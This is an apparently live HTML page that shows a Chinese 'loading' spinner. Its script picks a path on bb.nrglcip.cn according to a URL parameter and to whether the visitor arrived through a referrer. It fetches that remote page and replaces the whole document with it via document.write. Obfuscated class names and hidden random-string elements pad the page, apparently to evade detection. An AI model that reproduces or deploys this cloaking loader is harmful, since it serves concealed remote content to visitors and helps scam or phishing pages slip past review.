<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .UcywAMMrF {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .UcywAMMrF .bzpghm {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .UcywAMMrF .content {
            line-height: 50px;
            text-align: center
        }

        .UcywAMMrF .img {
            width: 100%
        }

        .UcywAMMrF .Y1aeBg {
            text-align: center
        }

        .UcywAMMrF .Y1aeBg span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .UcywAMMrF .Y1aeBg span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .UcywAMMrF .Y1aeBg span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .UcywAMMrF .Y1aeBg span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .UcywAMMrF .Y1aeBg span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .UcywAMMrF .Y1aeBg span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .UcywAMMrF .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function kMEkkK4cFB(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var eLtiw0 = kMEkkK4cFB('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ eLtiw0 +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ eLtiw0 +".html?a=share";
		}
		
        ossRV6dB97=url+"#"+new Date().getTime();
        ossRV6dB97 && function() {
            $.get(ossRV6dB97, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<ul style='display:none' >oX6L08dWgsQrwjfRoO8H</ul>
<span style='display:none'>x7fR1vvpY3lnqA5Cgf1hoN2XYlruwKa8x215DHsYhVTTwssfJk1Bv5xSkOddmgKksGGm4rJT99gp0z7ZkUuXlhAd2</span>
<ul style='display:none' >oX6L08dWgsQrwjfRoO8H</ul>
<ul style='display:none' >oX6L08dWgsQrwjfRoO8H</ul>
<ul style='display:none' >oX6L08dWgsQrwjfRoO8H</ul>
<li style='display:none' >Y3Gjc7HFznUTHco0FFzyBWOcNVd</li>
<b style='display:none' >DGfxgmtnYplaZ06Y50nlQAVzSkocUWL8iSBt6Me</b>
<div style='display:none'>Ewk0VvwHj9QjULafiOABJrm4cH8A</div>
<b style='display:none' >DGfxgmtnYplaZ06Y50nlQAVzSkocUWL8iSBt6Me</b><div class="UcywAMMrF">
    <div class="bzpghm">
        <div class="Y1aeBg">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<a  href='#' style='display:none'>cpZyrOeFCSpXT3O26M6Bz88zuPEellXY7T4cFdvQCysZp</a>
<img  src='' style='display:none'>
<p  style='display:none'>ftdRj1Z7ABzSsfXcZXRpYomBNracfXXNqsy4mYyvBnOGThZf2SLQDzpjj</p>
<span style='display:none'>yz2OhwrhrG9Ni7kTDxbOoGf1GeG0R99LiW2rho5guHcgCViByZBjiwnUyhl3wVHnGj62UxdRvKWGuNwAJNAAo1TMbS0QWU1qyobg</span>
<h1 style='display:none' >pgoZehvmmdtqadD64mEWFCBHvaHNZzcyXAdWG5RObNtlMNCXxph8iIVskJ1MGRilN0Z2geQQ9PsZ68xh</h1></body>
</html>